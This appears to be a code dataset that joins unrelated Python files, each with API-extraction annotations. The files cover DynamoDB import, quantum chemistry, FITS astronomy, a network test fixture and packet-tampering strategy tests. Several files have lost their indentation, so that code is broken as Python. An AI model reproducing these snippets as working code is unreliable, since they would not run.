def batch_create(table, csv_file_name, column_names):
'''
Can Handle many puts at one time. Boto3 gives an example of 50, even though
max batch size is 25, because batch writer is buffering and sending items behind the scenes.
'''
print('Beginning csv to dynamo import...')
with table.batch_writer() as batch:
with open(csv_file_name, newline='') as csv_file:
reader = csv.reader(csv_file)
# skip first row which we know is a header row
next(reader)
count = 0
for row in reader:
item = {}
for column in range (0, len(column_names)):
item[column_names[column]] = row[column]
batch.put_item(Item=item)
count += 1
if count % 100 == 0:
print('Inserted ' + str(count) + ' items...')
csv_file.close()
print('Finished importing data into dynamo...')
def validate(table, csv_file_name, partition_key_col_name, sort_key_col_name):
print('Beginning data validation...')
with open(csv_file_name, newline='') as csv_file:
reader = csv.reader(csv_file)
# skip first row which we know is a header row
next(reader)
for row in reader:
key = {partition_key_col_name: row[0], sort_key_col_name: row[1]}
try:
response = table.get_item(Key=key)
assert('Item' in response)
except AssertionError:
print('Failed to validate data. Key ' + json.dumps(key) + ' does not exist...')
csv_file.close()
print('Finished data validation...')
def main():
csv_file_name = ''
table_name = ''
region = 'us-west-2'
partition_key_col_name = ''
sort_key_col_name=''
column_names = [partition_key_col_name, sort_key_col_name, 'Column3']
dynamodb_resource = boto3.resource('dynamodb', region_name=region)
table = dynamodb_resource.Table(table_name)
batch_create(table, csv_file_name, column_names)
validate(table, csv_file_name, partition_key_col_name, sort_key_col_name)
if __name__ == "__main__":
main() | [
"boto3.resource",
"json.dumps",
"csv.reader"
] | [((2087, 2133), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'region_name': 'region'}), "('dynamodb', region_name=region)\n", (2101, 2133), False, 'import boto3\n'), ((1335, 1355), 'csv.reader', 'csv.reader', (['csv_file'], {}), '(csv_file)\n', (1345, 1355), False, 'import csv\n'), ((577, 597), 'csv.reader', 'csv.reader', (['csv_file'], {}), '(csv_file)\n', (587, 597), False, 'import csv\n'), ((1742, 1757), 'json.dumps', 'json.dumps', (['key'], {}), '(key)\n', (1752, 1757), False, 'import json\n')] |
import numpy as np
import scipy as sp
import ast
import os
from quchem.Unitary_Partitioning.Graph import Clique_cover_Hamiltonian
import quchem.Misc_functions.conversion_scripts as conv_scr
from copy import deepcopy
from quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method import LCU_linalg_Energy
from openfermion import qubit_operator_sparse
import pickle
import datetime
#######
import sys
# working_dir = os.getcwd()
working_dir = os.path.dirname(os.path.abspath(__file__)) # gets directory where running python file is!
Analysis_dir = os.path.join(working_dir, 'Analysis')
full_H_results_dir = os.path.join(Analysis_dir, 'SeqRot_LCU_script_A_results')
print('start time: {}'.format(datetime.datetime.now().strftime('%Y%b%d-%H%M%S%f')))
print('working directory:', working_dir)
###### IMPORT INITIAL RESULTS
## import LCU results
myriad_LCU_results = {}
for filename in os.listdir(full_H_results_dir):
if (filename.endswith('.pickle') and filename.startswith('LCU_CS_VQE_exp')):
file_path = os.path.join(full_H_results_dir, filename)
mol_name = filename[40:-8]
with open(file_path,'rb') as infile:
data = pickle.load(infile)
myriad_LCU_results[mol_name] = data
### find anti-commuting sets
unitary_paritioning_LCU={}
# optional params!
commutativity_flag = 'AC' ## <- defines relationship between sets!!!
Graph_colouring_strategy='largest_first'
check_reduction_LCU = False
######## take commandline arguement to run in parallel
mol_num = int(sys.argv[1])
sorted_mol_names = sorted(list(myriad_LCU_results.keys()))
mol_key = sorted_mol_names[mol_num-1] # UCL supercomputer indexes from 1, hence minus one here!
########
# for mol_key in tqdm(list(myriad_LCU_results.keys())): # removed loop and used myriad array input!
anti_commuting_sets_different_H_LCU_sizes={}
for ind_key in myriad_LCU_results[mol_key]:
if isinstance(ind_key, str):
continue
if ind_key==0:
# only non-contextual problem
anti_commuting_sets_different_H_LCU_sizes[ind_key]= {'AC_sets': {},
'E':myriad_LCU_results[mol_key][ind_key]['E']}
else:
### LCU
H_LCU_dict = myriad_LCU_results[mol_key][ind_key]['H']
H_LCU_pruned = {P_key: coeff.real for P_key, coeff in H_LCU_dict.items() if not np.isclose(coeff.real,0)}
H_LCU= conv_scr.Get_Openfermion_Hamiltonian(H_LCU_pruned)
n_qubits = len(list(H_LCU_dict.keys())[0])
anti_commuting_sets_LCU = Clique_cover_Hamiltonian(list(H_LCU),
n_qubits,
commutativity_flag,
Graph_colouring_strategy)
all_zero_Pn_index_dict = {set_key: 0 for set_key in anti_commuting_sets_LCU}
E_LCU = LCU_linalg_Energy(anti_commuting_sets_LCU,
all_zero_Pn_index_dict,
n_qubits,
atol=1e-8,
rtol=1e-05,
check_reduction=check_reduction_LCU)
anti_commuting_sets_different_H_LCU_sizes[ind_key]= {'AC_sets': anti_commuting_sets_LCU,
'E':E_LCU}
unitary_paritioning_LCU[mol_key]= deepcopy(anti_commuting_sets_different_H_LCU_sizes)
del anti_commuting_sets_different_H_LCU_sizes
####### SAVE OUTPUT details
unique_file_time = datetime.datetime.now().strftime('%Y%b%d-%H%M%S%f')
# output_dir = os.path.join(working_dir, 'Pickle_out')
output_dir = os.getcwd()
########
####### SAVE OUTPUT
file_name2 = 'Unitary_Partitinging_LCU_CS_VQE_LCU_exp__{}__{}_.pickle'.format(unique_file_time, mol_key)
file_out2=os.path.join(output_dir, file_name2)
with open(file_out2, 'wb') as outfile:
pickle.dump(unitary_paritioning_LCU, outfile)
print('pickle files dumped unqiue time id: {}'.format(unique_file_time))
print('end time: {}'.format(datetime.datetime.now().strftime('%Y%b%d-%H%M%S%f'))) | [
"os.listdir",
"pickle.dump",
"numpy.isclose",
"os.path.join",
"pickle.load",
"os.getcwd",
"quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method.LCU_linalg_Energy",
"quchem.Misc_functions.conversion_scripts.Get_Openfermion_Hamiltonian",
"datetime.datetime.now",
"copy.deepcopy",
"os.path.ab... | [((554, 591), 'os.path.join', 'os.path.join', (['working_dir', '"""Analysis"""'], {}), "(working_dir, 'Analysis')\n", (566, 591), False, 'import os\n'), ((613, 670), 'os.path.join', 'os.path.join', (['Analysis_dir', '"""SeqRot_LCU_script_A_results"""'], {}), "(Analysis_dir, 'SeqRot_LCU_script_A_results')\n", (625, 670), False, 'import os\n'), ((894, 924), 'os.listdir', 'os.listdir', (['full_H_results_dir'], {}), '(full_H_results_dir)\n', (904, 924), False, 'import os\n'), ((3341, 3392), 'copy.deepcopy', 'deepcopy', (['anti_commuting_sets_different_H_LCU_sizes'], {}), '(anti_commuting_sets_different_H_LCU_sizes)\n', (3349, 3392), False, 'from copy import deepcopy\n'), ((3608, 3619), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3617, 3619), False, 'import os\n'), ((3766, 3802), 'os.path.join', 'os.path.join', (['output_dir', 'file_name2'], {}), '(output_dir, file_name2)\n', (3778, 3802), False, 'import os\n'), ((465, 490), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (480, 490), False, 'import os\n'), ((3847, 3892), 'pickle.dump', 'pickle.dump', (['unitary_paritioning_LCU', 'outfile'], {}), '(unitary_paritioning_LCU, outfile)\n', (3858, 3892), False, 'import pickle\n'), ((1027, 1069), 'os.path.join', 'os.path.join', (['full_H_results_dir', 'filename'], {}), '(full_H_results_dir, filename)\n', (1039, 1069), False, 'import os\n'), ((2421, 2471), 'quchem.Misc_functions.conversion_scripts.Get_Openfermion_Hamiltonian', 'conv_scr.Get_Openfermion_Hamiltonian', (['H_LCU_pruned'], {}), '(H_LCU_pruned)\n', (2457, 2471), True, 'import quchem.Misc_functions.conversion_scripts as conv_scr\n'), ((2925, 3066), 'quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method.LCU_linalg_Energy', 'LCU_linalg_Energy', (['anti_commuting_sets_LCU', 'all_zero_Pn_index_dict', 'n_qubits'], {'atol': '(1e-08)', 'rtol': '(1e-05)', 'check_reduction': 'check_reduction_LCU'}), '(anti_commuting_sets_LCU, all_zero_Pn_index_dict, n_qubits,\n atol=1e-08, 
rtol=1e-05, check_reduction=check_reduction_LCU)\n', (2942, 3066), False, 'from quchem.Unitary_Partitioning.Unitary_partitioning_LCU_method import LCU_linalg_Energy\n'), ((3488, 3511), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3509, 3511), False, 'import datetime\n'), ((1170, 1189), 'pickle.load', 'pickle.load', (['infile'], {}), '(infile)\n', (1181, 1189), False, 'import pickle\n'), ((703, 726), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (724, 726), False, 'import datetime\n'), ((3997, 4020), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4018, 4020), False, 'import datetime\n'), ((2371, 2396), 'numpy.isclose', 'np.isclose', (['coeff.real', '(0)'], {}), '(coeff.real, 0)\n', (2381, 2396), True, 'import numpy as np\n')] |
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.13.0
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # PN Ou 5: Inspect original files
from pathlib import Path
from astropy.io import fits
from astropy.table import Table
dpath = Path("../data/originals/")
# Look and see what sort of files we have:
data = []
kwds = ["MEZMODE", "DATE-OBS", "FILTER", "RA", "DEC", "PA", "CCDTYPE", "CCDSUM"]
for _file in sorted(dpath.glob("*.fits")):
hdu = fits.open(_file)[0]
thisdata = {"File": _file.stem}
for k in kwds:
thisdata[k] = hdu.header.get(k)
data.append(thisdata)
tab = Table(rows=data)
tab.show_in_notebook()
# So we have 2017 data with 70 micron slit and 2x2 binning, and then 2018, 2019 data with 150 micron slit and 3x3 binning.
# Select the image+slit or slit+image files that we will need to do astrometry of
m = ["slit" in _ for _ in tab["MEZMODE"]]
tab[m]
# Write out a list of all the Image+slit files
listfile = dpath.parent / "image-list.dat"
listfile.write_text("\n".join(tab[m]["File"]))
listfile
# Check that it worked:
listfile.read_text().splitlines()
# ## Find the HEALpix coordinates of our source
from astropy.coordinates import SkyCoord, ICRS
import astropy.units as u
# All the positions should be about the same, so we just use the first one.
c = SkyCoord(tab[0]["RA"], tab[0]["DEC"], unit=(u.hourangle, u.deg))
c
from astropy_healpix import HEALPix
# In order to find which data files to download from http://data.astrometry.net/5000/, we need to translate the celestial coordinate to HEALpix index numbers:
hp_2 = HEALPix(nside=2, order="nested", frame=ICRS())
hp_1 = HEALPix(nside=1, order="nested", frame=ICRS())
# Levels 0 to 4 use the `nside=2` tiles.
hp_2.cone_search_skycoord(c, radius=5 * u.arcminute)
# So that means `index500[0-4]-13.fits`
hp_1.cone_search_skycoord(c, radius=5 * u.arcminute)
# So that means `index500[5-7]-03.fits`
# + tags=[]
hp_2.cone_search_lonlat(300 * u.deg, 50 * u.deg, 0.1 * u.deg)
# -
# ## Look at the HEALpix data files
#
# Something isn't right. I got the 13 series but the program complains that the coordinates are not contained in the tile.
hdulist = fits.open(dpath.parent / "astrometry-net" / "index-5004-13.fits")
hdulist.info()
# Looks like HDU 13 has the original table of stars:
hdulist[13].header
tstars = Table.read(hdulist[13])
df = tstars.to_pandas()
df[["ra", "dec"]].describe()
# So no wonder that is not working. I want (318.6, 43.7) but this has an RA range of 270 to 315
tstars2 = Table.read(fits.open(dpath.parent / "astrometry-net" / "index-5004-14.fits")[13])
df2 = tstars2.to_pandas()
df2[["ra", "dec"]].describe()
# So, it turns out that tile 14 is what I needed, not 13.
| [
"astropy.coordinates.ICRS",
"astropy.table.Table",
"pathlib.Path",
"astropy.coordinates.SkyCoord",
"astropy.io.fits.open",
"astropy.table.Table.read"
] | [((439, 465), 'pathlib.Path', 'Path', (['"""../data/originals/"""'], {}), "('../data/originals/')\n", (443, 465), False, 'from pathlib import Path\n'), ((802, 818), 'astropy.table.Table', 'Table', ([], {'rows': 'data'}), '(rows=data)\n', (807, 818), False, 'from astropy.table import Table\n'), ((1512, 1576), 'astropy.coordinates.SkyCoord', 'SkyCoord', (["tab[0]['RA']", "tab[0]['DEC']"], {'unit': '(u.hourangle, u.deg)'}), "(tab[0]['RA'], tab[0]['DEC'], unit=(u.hourangle, u.deg))\n", (1520, 1576), False, 'from astropy.coordinates import SkyCoord, ICRS\n'), ((2371, 2436), 'astropy.io.fits.open', 'fits.open', (["(dpath.parent / 'astrometry-net' / 'index-5004-13.fits')"], {}), "(dpath.parent / 'astrometry-net' / 'index-5004-13.fits')\n", (2380, 2436), False, 'from astropy.io import fits\n'), ((2536, 2559), 'astropy.table.Table.read', 'Table.read', (['hdulist[13]'], {}), '(hdulist[13])\n', (2546, 2559), False, 'from astropy.table import Table\n'), ((655, 671), 'astropy.io.fits.open', 'fits.open', (['_file'], {}), '(_file)\n', (664, 671), False, 'from astropy.io import fits\n'), ((1823, 1829), 'astropy.coordinates.ICRS', 'ICRS', ([], {}), '()\n', (1827, 1829), False, 'from astropy.coordinates import SkyCoord, ICRS\n'), ((1877, 1883), 'astropy.coordinates.ICRS', 'ICRS', ([], {}), '()\n', (1881, 1883), False, 'from astropy.coordinates import SkyCoord, ICRS\n'), ((2735, 2800), 'astropy.io.fits.open', 'fits.open', (["(dpath.parent / 'astrometry-net' / 'index-5004-14.fits')"], {}), "(dpath.parent / 'astrometry-net' / 'index-5004-14.fits')\n", (2744, 2800), False, 'from astropy.io import fits\n')] |
import project_test
from common.contrail_test_init import ContrailTestInit
from common.connections import ContrailConnections
import os
import fixtures
from test import BaseTestCase
import time
from floating_ip import *
from vn_test import *
from control_node import *
from common import isolated_creds
from tcutils.util import Singleton
class PublicVn(fixtures.Fixture):
__metaclass__ = Singleton
def __init__(self, isolated_creds_obj, inputs, ini_file = None ,logger = None, mx_rt = None):
self.isolated_creds = isolated_creds_obj
self.username = self.isolated_creds.username
self.password = self.isolated_creds.password
self.inputs = inputs
self.ini_file = ini_file
self.logger = logger
self.public_vn = self.inputs.public_vn
self.public_tenant = self.inputs.admin_tenant
self.setUp()
self.create_public_vn(mx_rt)
self.create_floatingip_pool()
self.configure_control_nodes()
def setUp(self):
super(PublicVn, self).setUp()
self.project = self.isolated_creds.create_tenant(self.public_tenant)
self.inputs = self.isolated_creds.get_inputs(self.project)
self.connections = self.isolated_creds.get_connections(self.inputs)
if self.isolated_creds.__class__.__name__ == 'AdminIsolatedCreds':
# If AdminIsolatedCreds, one could add user to tenant
# Else, it is assumed that the administrator has taken
# care
self.isolated_creds.create_and_attach_user_to_tenant(
self.project,
self.username,
self.password)
self.project.set_sec_group_for_allow_all(\
self.public_tenant, 'default')
# end setUp
def create_public_vn(self,mx_rt = None):
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
fip_pool_name = self.inputs.fip_pool_name
fvn_name = self.public_vn
fip_subnets = [self.inputs.fip_pool]
if not mx_rt:
mx_rt = self.inputs.mx_rt
self.public_vn_fixture = self.useFixture(
VNFixture(
project_name=self.project.project_name,
connections=self.connections,
vn_name=fvn_name,
inputs=self.inputs,
subnets=fip_subnets,
router_asn=self.inputs.router_asn,
rt_number=mx_rt,
router_external=True))
assert self.public_vn_fixture.verify_on_setup()
self.logger.info('created public VN:%s' % fvn_name)
# end createPublicVN
def create_floatingip_pool(self):
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
fip_pool_name = self.inputs.fip_pool_name
fvn_name = self.public_vn
fip_subnets = [self.inputs.fip_pool]
self.fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.public_tenant,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=self.public_vn_fixture.vn_id,
option='neutron',
vn_name=fvn_name))
assert self.fip_fixture.verify_on_setup()
self.logger.info('created FIP Pool:%s under Project:%s' %
(self.fip_fixture.pool_name,
self.project.project_name))
# end createfloatingip
def configure_control_nodes(self):
# Configuring all control nodes here
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
router_name = self.inputs.ext_routers[0][0]
router_ip = self.inputs.ext_routers[0][1]
for entry in self.inputs.bgp_ips:
hostname = self.inputs.host_data[entry]['name']
entry_control_ip = self.inputs.host_data[
entry]['host_control_ip']
cn_fixture1 = self.useFixture(
CNFixture(
connections=self.connections,
router_name=hostname,
router_ip=entry_control_ip,
router_type='contrail',
inputs=self.inputs))
cn_fixturemx = self.useFixture(
CNFixture(
connections=self.connections,
router_name=router_name,
router_ip=router_ip,
router_type='mx',
inputs=self.inputs))
sleep(10)
assert cn_fixturemx.verify_on_setup()
# TODO Configure MX. Doing Manually For Now
| [
"os.environ.get"
] | [((1886, 1914), 'os.environ.get', 'os.environ.get', (['"""MX_GW_TEST"""'], {}), "('MX_GW_TEST')\n", (1900, 1914), False, 'import os\n'), ((2830, 2858), 'os.environ.get', 'os.environ.get', (['"""MX_GW_TEST"""'], {}), "('MX_GW_TEST')\n", (2844, 2858), False, 'import os\n'), ((3829, 3857), 'os.environ.get', 'os.environ.get', (['"""MX_GW_TEST"""'], {}), "('MX_GW_TEST')\n", (3843, 3857), False, 'import os\n')] |
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from ..base_object import BaseObject
class GetVoiceChatAvailableParticipants(BaseObject):
"""
Returns list of participant identifiers, which can be used to join voice chats in a chat
:param chat_id: Chat identifier
:type chat_id: :class:`int`
"""
ID: str = Field("getVoiceChatAvailableParticipants", alias="@type")
chat_id: int
@staticmethod
def read(q: dict) -> GetVoiceChatAvailableParticipants:
return GetVoiceChatAvailableParticipants.construct(**q)
| [
"pydantic.Field"
] | [((778, 835), 'pydantic.Field', 'Field', (['"""getVoiceChatAvailableParticipants"""'], {'alias': '"""@type"""'}), "('getVoiceChatAvailableParticipants', alias='@type')\n", (783, 835), False, 'from pydantic import Field\n')] |
import logging
import os
from scapy.all import IP, TCP
import actions.tree
import actions.drop
import actions.tamper
import actions.duplicate
import actions.utils
import layers.packet
def test_init():
    """
    Smoke-tests action discovery: fetching the registered outbound actions
    should succeed without raising.
    """
    registered = actions.action.Action.get_actions("out")
    print(registered)
def test_count_leaves():
    """
    Verifies that the action tree reports the correct number of leaf nodes
    as actions are attached, linked, and removed.
    """
    tree = actions.tree.ActionTree("out")
    logger = logging.getLogger("test")
    # A malformed DNA string (missing the bracketed trigger) must be rejected
    assert not tree.parse("TCP:reserved:0tamper{TCP:flags:replace:S}-|", logger), "Tree parsed malformed DNA"
    tree.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
    dup_a = actions.duplicate.DuplicateAction()
    dup_b = actions.duplicate.DuplicateAction()
    drop_action = actions.drop.DropAction()
    assert tree.count_leaves() == 1
    assert tree.remove_one()
    tree.add_action(dup_a)
    assert tree.count_leaves() == 1
    # Chaining a left child does not add a leaf -- the chain still ends in one node
    dup_a.left = dup_b
    assert tree.count_leaves() == 1
    # Filling the right branch creates a second, independent leaf
    dup_a.right = drop_action
    assert tree.count_leaves() == 2
def test_check():
    """
    Tests action tree check function.
    """
    a = actions.tree.ActionTree("out")
    logger = logging.getLogger("test")
    a.parse("[TCP:flags:RA]-tamper{TCP:flags:replace:S}-|", logger)
    # An ACK-only packet must not fire the TCP:flags:RA trigger
    p = layers.packet.Packet(IP()/TCP(flags="A"))
    assert not a.check(p, logger)
    # A packet with flags RA matches the trigger
    p = layers.packet.Packet(IP(ttl=64)/TCP(flags="RA"))
    assert a.check(p, logger)
    # Removing an action does not change whether the trigger fires
    assert a.remove_one()
    assert a.check(p, logger)
    a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
    assert a.check(p, logger)
    # Triggers can also match on IP-layer fields
    a.parse("[IP:ttl:64]-tamper{TCP:flags:replace:S}-|", logger)
    assert a.check(p, logger)
    # A different TTL must not satisfy the IP:ttl:64 trigger
    p = layers.packet.Packet(IP(ttl=15)/TCP(flags="RA"))
    assert not a.check(p, logger)
def test_scapy():
    """
    Tests misc. scapy aspects relevant to strategies.
    """
    a = actions.tree.ActionTree("out")
    logger = logging.getLogger("test")
    a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
    p = layers.packet.Packet(IP()/TCP(flags="A"))
    assert a.check(p, logger)
    # Running the tree rewrites the TCP flags to SYN
    packets = a.run(p, logger)
    assert packets[0][TCP].flags == "S"
    p = layers.packet.Packet(IP()/TCP(flags="A"))
    assert a.check(p, logger)
    # Corrupting the checksum still leaves a truthy chksum field scapy can read back
    a.parse("[TCP:reserved:0]-tamper{TCP:chksum:corrupt}-|", logger)
    packets = a.run(p, logger)
    assert packets[0][TCP].chksum
    assert a.check(p, logger)
def test_str():
    """
    Tests string representation.
    """
    logger = logging.getLogger("test")
    t = actions.trigger.Trigger("field", "flags", "TCP")
    a = actions.tree.ActionTree("out", trigger=t)
    # An empty tree renders as just its trigger
    assert str(a).strip() == "[%s]-|" % str(t)
    tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    assert a.add_action(tamper)
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
    # Tree will not add a duplicate action
    assert not a.add_action(tamper)
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
    assert a.add_action(tamper2)
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|"
    assert a.add_action(actions.duplicate.DuplicateAction())
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
    drop = actions.drop.DropAction()
    assert a.add_action(drop)
    # The drop may land in either branch of the duplicate, so accept both renderings
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(drop,),),)-|" or \
            str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(,drop),),)-|"
    assert a.remove_action(drop)
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
    # Cannot remove action that is not present
    assert not a.remove_action(drop)
    assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
    a = actions.tree.ActionTree("out", trigger=t)
    orig = "[TCP:urgptr:15963]-duplicate(,drop)-|"
    a.parse(orig, logger)
    # remove_one removes a random action, so either survivor is acceptable
    assert a.remove_one()
    assert orig != str(a)
    assert str(a) in ["[TCP:urgptr:15963]-drop-|", "[TCP:urgptr:15963]-duplicate-|"]
def test_pretty_print_send():
    """A lone duplicate action renders both of its (empty) send branches."""
    trigger = actions.trigger.Trigger("field", "flags", "TCP")
    tree = actions.tree.ActionTree("out", trigger=trigger)
    tree.add_action(actions.duplicate.DuplicateAction())
    expected = "TCP:flags:0\nduplicate\n├── ===> \n└── ===> "
    assert tree.pretty_print() == expected
def test_pretty_print():
    """
    Print complex tree, although difficult to test.
    Builds a deep duplicate/tamper/drop tree and checks both the textual and the
    visual (graphviz) renderings.
    """
    # Build the logger locally instead of taking it as a pytest fixture parameter;
    # every other test in this module constructs its own logger the same way.
    logger = logging.getLogger("test")
    t = actions.trigger.Trigger("field", "flags", "TCP")
    a = actions.tree.ActionTree("out", trigger=t)
    tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    duplicate = actions.duplicate.DuplicateAction()
    duplicate2 = actions.duplicate.DuplicateAction()
    duplicate3 = actions.duplicate.DuplicateAction()
    duplicate4 = actions.duplicate.DuplicateAction()
    duplicate5 = actions.duplicate.DuplicateAction()
    drop = actions.drop.DropAction()
    drop2 = actions.drop.DropAction()
    drop3 = actions.drop.DropAction()
    drop4 = actions.drop.DropAction()
    # Wire the branches up by hand to get a deterministic tree shape
    duplicate.left = duplicate2
    duplicate.right = duplicate3
    duplicate2.left = tamper
    duplicate2.right = drop
    duplicate3.left = duplicate4
    duplicate3.right = drop2
    duplicate4.left = duplicate5
    duplicate4.right = drop3
    duplicate5.left = drop4
    duplicate5.right = tamper2
    a.add_action(duplicate)
    correct_string = "TCP:flags:0\nduplicate\n├── duplicate\n│   ├── tamper{TCP:flags:replace:S}\n│   │   └──  ===> \n│   └── drop\n└── duplicate\n    ├── duplicate\n    │   ├── duplicate\n    │   │   ├── drop\n    │   │   └── tamper{TCP:flags:replace:R}\n    │   │       └──  ===> \n    │   └── drop\n    └── drop"
    assert a.pretty_print() == correct_string
    # Visual rendering writes tree.png as a side effect; clean it up afterwards
    assert a.pretty_print(visual=True)
    assert os.path.exists("tree.png")
    os.remove("tree.png")
    a.parse("[TCP:flags:0]-|", logger)
    a.pretty_print(visual=True) # Empty action tree
    assert not os.path.exists("tree.png")
def test_pretty_print_order():
    """
    Tests the left/right ordering by reading in a new tree
    """
    log = logging.getLogger("test")
    tree = actions.tree.ActionTree("out")
    assert tree.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S}(tamper{TCP:chksum:replace:14239},),))-|", log)
    expected = "TCP:flags:A\nduplicate\n├── tamper{TCP:flags:replace:R}\n│   └── tamper{TCP:chksum:replace:14239}\n│       └──  ===> \n└── duplicate\n    ├── tamper{TCP:flags:replace:S}\n    │   └── tamper{TCP:chksum:replace:14239}\n    │       └──  ===> \n    └──  ===> "
    assert tree.pretty_print() == expected
def test_parse():
    """
    Tests string parsing.
    """
    logger = logging.getLogger("test")
    t = actions.trigger.Trigger("field", "flags", "TCP")
    a = actions.tree.ActionTree("out", trigger=t)
    # base_a is built up by hand and compared against the parsed tree at each step
    base_t = actions.trigger.Trigger("field", "flags", "TCP")
    base_a = actions.tree.ActionTree("out", trigger=base_t)
    tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    a.parse("[TCP:flags:0]-|", logger)
    assert str(a) == str(base_a)
    assert len(a) == 0
    base_a.add_action(tamper)
    assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}-|", logger)
    assert str(a) == str(base_a)
    assert len(a) == 1
    assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|", logging.getLogger("test"))
    base_a.add_action(tamper2)
    assert str(a) == str(base_a)
    assert len(a) == 2
    base_a.add_action(tamper3)
    base_a.add_action(tamper4)
    # Deeply nested chains of single-child actions round-trip too
    assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},),),)-|", logging.getLogger("test"))
    assert str(a) == str(base_a)
    assert len(a) == 4
    base_t = actions.trigger.Trigger("field", "flags", "TCP")
    base_a = actions.tree.ActionTree("out", trigger=base_t)
    duplicate = actions.duplicate.DuplicateAction()
    assert a.parse("[TCP:flags:0]-duplicate-|", logger)
    base_a.add_action(duplicate)
    assert str(a) == str(base_a)
    tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
    tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="A")
    tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
    # Branching actions can carry left-only, left+right, and nested children
    duplicate.left = tamper
    assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},)-|", logger)
    assert str(a) == str(base_a)
    duplicate.right = tamper2
    assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-|", logger)
    assert str(a) == str(base_a)
    tamper2.left = tamper3
    assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:A},))-|", logger)
    assert str(a) == str(base_a)
    # A whole strategy string parses into out/in action forests
    strategy = actions.utils.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-| \/", logger)
    assert strategy
    assert len(strategy.out_actions[0]) == 3
    assert len(strategy.in_actions) == 0
    # Malformed DNA strings must all be rejected
    assert not a.parse("[]", logger) # No valid trigger
    assert not a.parse("[TCP:flags:0]-", logger) # No valid ending "|"
    assert not a.parse("[TCP:]-|", logger) # invalid trigger
    assert not a.parse("[TCP:flags:0]-foo-|", logger) # Non-existent action
    assert not a.parse("[TCP:flags:0]--|", logger) # Empty action
    assert not a.parse("[TCP:flags:0]-duplicate(,,,)-|", logger) # Bad tree
    assert not a.parse("[TCP:flags:0]-duplicate()))-|", logger) # Bad tree
    assert not a.parse("[TCP:flags:0]-duplicate(((()-|", logger) # Bad tree
    assert not a.parse("[TCP:flags:0]-duplicate(,))))-|", logger) # Bad tree
    assert not a.parse("[TCP:flags:0]-drop(duplicate,)-|", logger) # Terminal action with children
    assert not a.parse("[TCP:flags:0]-drop(duplicate,duplicate)-|", logger) # Terminal action with children
    assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(,duplicate)-|", logger) # Non-branching action with right child
    assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,duplicate)-|", logger) # Non-branching action with children
def test_tree():
    """
    Tests basic tree functionality.
    """
    t = actions.trigger.Trigger(None, None, None)
